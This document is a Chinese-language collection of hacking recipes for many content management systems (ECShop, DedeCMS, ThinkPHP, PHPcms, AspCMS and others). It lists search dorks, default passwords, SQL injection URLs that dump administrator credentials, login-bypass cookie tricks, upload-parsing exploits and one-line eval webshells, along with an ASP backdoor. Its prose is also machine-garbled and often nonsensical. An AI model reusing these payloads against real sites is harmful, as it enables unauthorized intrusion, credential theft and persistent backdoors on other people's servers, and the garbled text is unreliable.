select * into [a] in ‘e:webwebshellcc1.asa;x.xls’ ‘excel 4.0;’ from cmd 把cmd表a的源委导出到路线e:webwebshellcc的EXCEL文件
drop table cmd 删除建设构造的cmd表

菜刀连接:

【 利用过滤’or’=’or’修正代码进行绕过 】

诸如后台地址是:
当用万能密码登陆的时候,会师世有的过滤or的唤起!

请右键查看源文件,另存为桌面 XX.html,然后展开找到以下这段代码,实行删减!

注意:将以下段代码中的 “index.asp?action=chkadmin” 改革为 “

终极保存打开,再用’or’=’or’登入时,系统已不再过滤,结果就能够用万能密码登入进去了!

 

==========================================================================================================================

【 动力3.5拿shell 】

inurl:printpage.asp?ArticleID=

1.找到版权消息,把内容替换到:

版权全体 Copyright? 2002 重力空间” ‘版权新闻
if Request(“xiaoxin”)=”520″ then
dim allen,creat,text,thisline,path
if Request(“creat”)=”yes” then
Set fs = CreateObject(“Scripting.FileSystemObject”)
Set outfile=fs.CreateTextFile(server.mappath(Request(“path”)))
outfile.WriteLine Request(“text”)
Response.write “小新恭喜”
end if
Response.write “


Response.write “

”&thisline&”


Response.write “”
Response.write “


Response.end
end if
%>2.然后保存,千万别跳转此外页面,直接在IE地址栏内将 admin/Admin_Login.asp 替换成

inc/config.asp?xiaoxin=5203.得逞后会步入三个像小马相似的页面,粘贴木马代码甚至写上木马文件名就能够得到wshell,木马在inc目录。

 

【 aspcms】

简言之描述:后台文件AspCms_AboutEdit.asp 未开展表明,且未过滤,引致SQL注入。
爆帐号密码:
admin/_content/_About/AspCms_AboutEdit.asp?id=1 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 from aspcms_user where userid=1
本子差别供给更改值。

其次种办法,找到后台,然后/admin/_system/AspCms_SiteSetting.asp?action=saves
直接POST
[php]runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn
& smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1
& LanguageID=1[/php]
再连接配置文件config.asp 密码为#

老版本中得以因而抬高模板直接增加asp.可是新版已经节制了拉长模板的格式为html,js,css
当然假设是遇到iis6的话依然得以经过iis6的分析漏洞把文件名改成1.asp;.html这样的格式来获得shell的.

办法:点击“分界面风格”,然后选“编辑模板/CSS文件”,然后“增添模板”,文件名称写error.asp;.html,文件内容写一句话<%eval request(“g”)%>

然后加上,会提醒增加成功,然后在模板列表中就可以找到我们抬高的一句话了,用菜刀连接就可以!
只是生机勃勃旦遇到iis7.5呢? 以下是自家本人找到发掘到的aspcms通杀版本的后台拿shell方法.

1、步向后台,“扩张功效”–“幻灯片设置”–”幻灯样式”

2、使用chorme的核查元素功能照旧firefox的firebug,由此可以看到使用能改改当前页面成分的工具就好了,将相应的slidestyle的value的值改善为1%><%Eval(Request

(chr(65)))%><% 3、一句话木马,密码a。在/config/AspCms_Config.asp

【 XYCMS集团建站系统 】

首要词:inurl:showkbxx.asp?id= 暗中同意数据库:data/xy#!123.mdb 暗许账户密码:admin admin 找到网址配置,在网站名称里面直接插入一句话:网址”%><%eval request(“x”)%><%’,注意不要删掉网址名称!然后中华夏儿女民共和国菜刀连接:/inc/config.asp

【 szwyadmin漏洞绕过后台验证 】

关键字:inurl:szwyadmin/login.asp
javascript:alert(document.cookie=”adminuser=”+escape(“‘or’=’or'”));javascript:alert(document.cookie=”adminpass=”+escape(“‘or’=’or'”));javascript:alert(document.cookie=”admindj=”+escape(“1″));

1.后台平时设有多少个szwyadmin文件夹,复制一下后台地址位于生机勃勃边,之后复制代码替换后台地址访谈实行注射!

2.那儿会弹出一个窗口,三番四遍点击一回显著。

3.再度访谈后台地址,把网址背后的/login.asp 换来 admin_index.asp

有时候般的直接步向后台了!

【 保健室建站系统随机文件上传漏洞 】

关键词:inurl:cms/Column.aspx?
关键词:inurl:cms/Column.aspx?LMID=
漏洞使用 :xtwh/upfile.aspx

直白上传aspx木马拿shell。

【 嘉友科学和技术cms上传漏洞 】

Google首要字:inurl:newslist.asp?NodeCode=
程序行使的上传页uploadfile.asp未进行管制验证,诱致建构畸形目录上传图片木马获取shell漏洞。
exp:ploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp他原上传目录是:uploadfile.asp?uppath=PicPath&upname=&uptext=form1.PicPath
况兼他的上传文件并没有过滤引致未授权访谈,直接上传小马,然后小马后边写为1.jpg

访谈路线 查看源代码。

【 ecshopcms后台拿shell 】

支撑新型2.7.2版本,通杀最新版本后台低权限!

后台-订单处理-订单打字与印刷-选择源代码编辑-保存-重返订单列表,随便采取三个订单打字与印刷,重回OK,生成一句话成功-在根目录生成了一个null.php,一句话密码:usb

【 教育站sql注入通杀0day 】

关键词:inurl:info_Print.asp?ArticleID=
暗中同意后台:www.xx.com/ad_login.asp
比如:
加上:union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin

如此那般就直接获得了组织者账户和透过Md5加密的密码了。

【 IIS7.0 异形剖析漏洞通杀oday 】

找到有个别使用IIS7.0架设的站,然后找到当中的图片上传点(不须要管理权限,普通注册客商就能够消除卡塔 尔(英语:State of Qatar),把PHP一句话图片木马缀改成.jpg,传上去,获得图片地址。
在图片格式前边加多xx.php

xx随意你怎么填,只要后缀为.php就好,之后菜刀连接就能够!

【 Yothcms 遍历目录漏洞 】

优斯科学和技术公司网址管理连串(YothCMS)是生龙活虎款完全开源免费的CMS。
暗中同意后台:admin/login.asp
遍历目录:ewebeditor/manage/upload.asp?id=1&dir=../

数据库路线:%23da%23ta%23%23db_%23data%23%23.asa

【 传信网络独立开拓网址源码0day漏洞 】

暗中同意后台:system/login.asp
编辑器后台路线:ubbcode/admin_login.asp
数据库路线:ubbcode/db/ewebeditor.mdb

私下认可账号密码:yzm 111111

科讯cms 6.5后台拿shell 】

1.足以在数据库备份中找到网址的相对路径
2.行使科讯SQL注入漏洞使用工具也能找到步入后台后实践sql命令:
create table E:wenxiushiwz001KS_DataCollectKS_Collect.Mdb.cmd (a varchar(50))
insert into E:wenxiushiwz001KS_DataCollectKS_Collect.Mdb.cmd (a) values (‘┼攠數畣整爠煥敵瑳∨∣┩愾’)

接着数据库备份成1.asp 菜刀连接密码:#

【 动易2006后台拿shell 】

跻身后台后,大家在侧边菜单栏中甄选“系统安装”,然后在现身的菜单栏里甄选“自定义页面管理”,
跟着必要先增添四个自定义页面分类,接纳“增加自定义分类”这一个选项,分类名称与分类简要介绍都足以任由填写。填写实现后选用“增多”,系统提醒增加成功。
上面再来选取“增多自定义页面”,“页面名称”随意输入,“所属分类”便是刚刚建设构造的分类就可以了。“页面类型”和“页面路线”都无须管,保持暗中同意.
唯独只要未有改页面路线的话,暗许生成的文件是在根目录下的,也正是
“页面简单介绍”也不用管,上边正是页面内容了。这里填入小马的代码。一切达成点击“增加”会提醒保存自定义页面成功。最终一步是要生成我们的木马页面。
接收“自定义页面处理首页”,点击侧边出现的“生花销页”就OK

了,成功博得动易的shell。

【 Shopex4.8.5 注入漏洞后台拿shell 】

关键词:powered by shopex v4.8.5
exp:Shopex 4.8.5 SQL Injection Exp

Shopex 4.8.5 SQL Injection Exp (product-gnotify)

fuck

 

保留为html格式,替换代码中的网址,当地打开后点击小Logo,现身新页面,帐号密码爆出来了,私下认可后台:shopadmin
拿shell方法….

第一步 页面管理 修正模版 然后选叁个XML编辑
起头用 live http 抓包 你们懂的 然后把第一个POST包给抓出来

然后改包 id=1273923028-info.xml&tmpid=1273923028&name=index_temp.php&file_source=
解释一下 id是您接受的沙盘文件夹名称 前边的info.xml 是你改改的XML文件 tmpid= 你们懂的 正是模版文件夹 然后 name 是你提交的文件名字 file_source 是后门只怕shel
本人这里是一句话 你们懂的 然后交给了后来 地址是那般的
—————————————————————————————————————————————————————-

【 ecshop漏洞总汇 】

首要字:powered by ecshop普通代码:user.php?act=order_query&order_sn=’ union select 1,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8 from ecs_admin_user/*
变种代码:search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2LacrossezX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319
一贯在网址后台踏入代码回车就能够揭穿帐号密码,再去掉代码加上/admin回车就会直接进后台了。拿shell方法很简单,找到“库项目管理”再选择“配送的法子”,在代码最下边插入php一句话木马: 不行就换php木马的预代码!
随后保存,一句话路线是: ; 展开“ASP+PHP两种用场Shell.html”填入地址,点击一下意况变量,成功以往点击上传文件就足以拿shell了。
—————————————————————————————————————————————————————-

【 帝国cms 6.6最新版本 】

自定义页面-扩充自定义页面-随意写个.php文件名,内容写:
倘诺剧情一直添一句话或然php马拉西亚是对事情没有什么帮助的,因为她会生成xxx.php前先给您推行,
PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= 就是 的base64加密。
进而生成xxx.php后 会现身内容 在文书里,然后用菜刀直接连接吧。
—————————————————————————————————————————————————————-

【 phpweb 】

关键字:inurl:down/class/index.php?myord=
后台地址:admin.php
万能密码:admin ‘or ‘1’=’1
流入地址:down/class/index.php?myord=1
表段:pwn_base_admin
拿shell通杀漏洞:登录后台–文章–文章发表–文章内容里的图形上传按键–抓包之后改包NC提交。
也得以用上面包车型大巴exp拿shell:
用火狐浏览器登入后台,因为火狐浏览器有保留cookies的职能, 找到“phpweb之exp”那一个html,拉进火狐浏览器器里上传1.php;.jpg的一句话木马,查看源码菜刀连接!
—————————————————————————————————————————————————————-

动科(dkcms)漏洞:

官方网站:www.dkcms.com主若是基本上3个版本为主吧,
V2.0 data/dkcm_ssdfhwejkfs.mdb
V3.1 _data/___dkcms_30_free.mdb
V4.2 _data/I^(()UU()H.mdb
默许后台:admin
编辑器:admin/fckeditor
后台拿shell,fck编辑器突破可拿shell
建立asp文件夹
Fck的路径:Admin/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/mk.asp&NewFolderName=mk.asp
—————————————————————————————————————————————————————-

ESPCMS通杀0day :

关键字:inurl:index.php?ac=article&at=read&did=
私下认可后台:adminsoft/index.php siteadmin/index.php
注入点(爆表前缀):index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
爆帐号:index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
爆密码:index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,password,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
帐号和密码贰次性爆:index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,password)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
进到后台后,直接点击分类图片-更正-选拔文件-间接上传php一句话木马
PS:当上传不了php木卯时,去系统装置一下,增添图片上传格式 |php ,这样就足以上传一个图形文件头的php木马。
—————————————————————————————————————————————————————-

Thinkphp框架大肆代码推行漏洞 :

ThinkPHP是后生可畏款国内使用比较广泛的显赫PHP MVC框架
第一字:thinkphp intitle:系统一发布生错误
获得Thinkphp的版本号:index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D
赢得服务器的配备消息:index.php/module/aciton/param1/${@phpinfo()}
列出网址有着文件列表:index.php/module/action/param1/{${system($_GET[‘x’])}}?x=ls -al
一向在网页执行一句话:index.php/module/action/param1/{${eval($_POST展开)}}
菜刀连接: 密码:s
—————————————————————————————————————————————————————-

良精系统 :

( 爆助理馆员帐号密码的代码 )
NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20”=’
( 一句话木马的妙用 卡塔尔国
插入一句话木马后,连接网址的安排文件:inc/config.asp 密码都是g
1.网址配置-允许的上传文件类型-插入闭合的一句话木马:”%><%eval request(“g”)%><%s=” 不行就增添四个cer格式,之后上传cer格式的木马就能够2.网址配置-网址地址-插入闭合的一句话木马: 3.网址配置-网址名称-插入闭合的一句话木马:江门临港彩越化学工业有限公司”%><%eval request(“g”)%><%s=” 4.网站配置-版权新闻-插入闭合的一句话木马:”%><%eval(request(chr(103)))%><%’
( 利用upfile_other.asp漏洞拿shell )
一贯访问会员大旨:userreg.asp
挂号贰个客户并在未脱离登录的情状下,使用双文件上传工具得以爆它女华,以下代码保存为1.html,并里面包车型大巴改良目的站,第二个上传jpg,第一个上传cer

别的能够采纳会员宗旨的cookies,用火狐浏览器登入之后,访谈upfile_other.asp页面,用抓包工具去抓包,接着用明小子上传拿shell.

 

( 上传漏洞 卡塔尔
漏洞文件:Upfile_Photo.asp
前提是跻身后台了,访谈那么些文件,将唤起“请先选拔你要上传的文书!”,用抓包工具抓管理员的cookies,再把上传地址跟cookies扔到名小子里上传拿shell

( 南方在线编辑器 卡塔尔国

私下认可后台:admin/Southidceditor/admin_style.asp
数据库路线:admin/SouthidcEditorDatasSouthidc艾德itor.mdb
遍历目录:admin/Southidceditor/admin_uploadfile.asp?id=14&dir=../..
文本上传页面:admin/Southidceditor/ewebeditor.asp?id=57&style=southidc
体制设置页面:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47
—————————————————————————————————————————————————————-

dedecms注入漏洞及找后台能力 :

会见这么些:plus/search.php?keyword=as&typeArr[ uNion ]=a
看结果生龙活虎旦提示:Safe Alert: Request Error step 1 !那么直接用上面包车型大巴exp爆出全数管理员的帐号密码:
plus/search.php?keyword=as&typeArr[111%3D@')+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+%23@__admin+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@'+]=a
看结果后生可畏旦提醒:Safe Alert: Request Error step 2 !
那么直接用上边包车型客车exp爆出全体管理员的帐号密码
plus/search.php?keyword=as&typeArr[111%3D@')+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+%23@__admin%23@'+]=a
微微/plus/目录换来了/plugins/目录,此时就要把/plus/换来/plugins/举行注射了
破解出md5为二十人结果,只供给把前贰个人和后壹个人去掉,剩余16位拿去解密就可以
怎么样找后台?
暗中认可后台:dede
首先种办法:data/mysql_error_trace.inc (有的时候可以爆出路线卡塔 尔(英语:State of Qatar)
其次种办法:把域名作为后台去尝试
其两种方法:查看这一个文件:robots.txt
第各类方式:ping下域名得到ip之后, 寻觅:ip:127.0.0.1 php (恐怕得到后台也足以赢得其余旁注站,平日dede的旁站广大也是dedecms的卡塔尔国
—————————————————————————————————————————————————————-

 

PHPcms V9 爆数据库音讯漏洞:
直白暴光数据库连接消息:/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php
关于后台拿webshell:走入后台后点击分界面–模版风格–随意找个页面点击改革,插入大家的一句话代码
@fwrite($fp, ‘<‘.’?php’.”rnrn”.’eval($_POST[0day])’.”rnrn?”.”>rn”);
点击保存,接着点击可视化,代码就瓜熟蒂落进行了,接着菜刀连接/0day.php,密码0day

本文由手机版美高梅网站发布于新闻,转载请注明出处:网址个人渗透本事采撷与计算,主流网站程序O

关键词: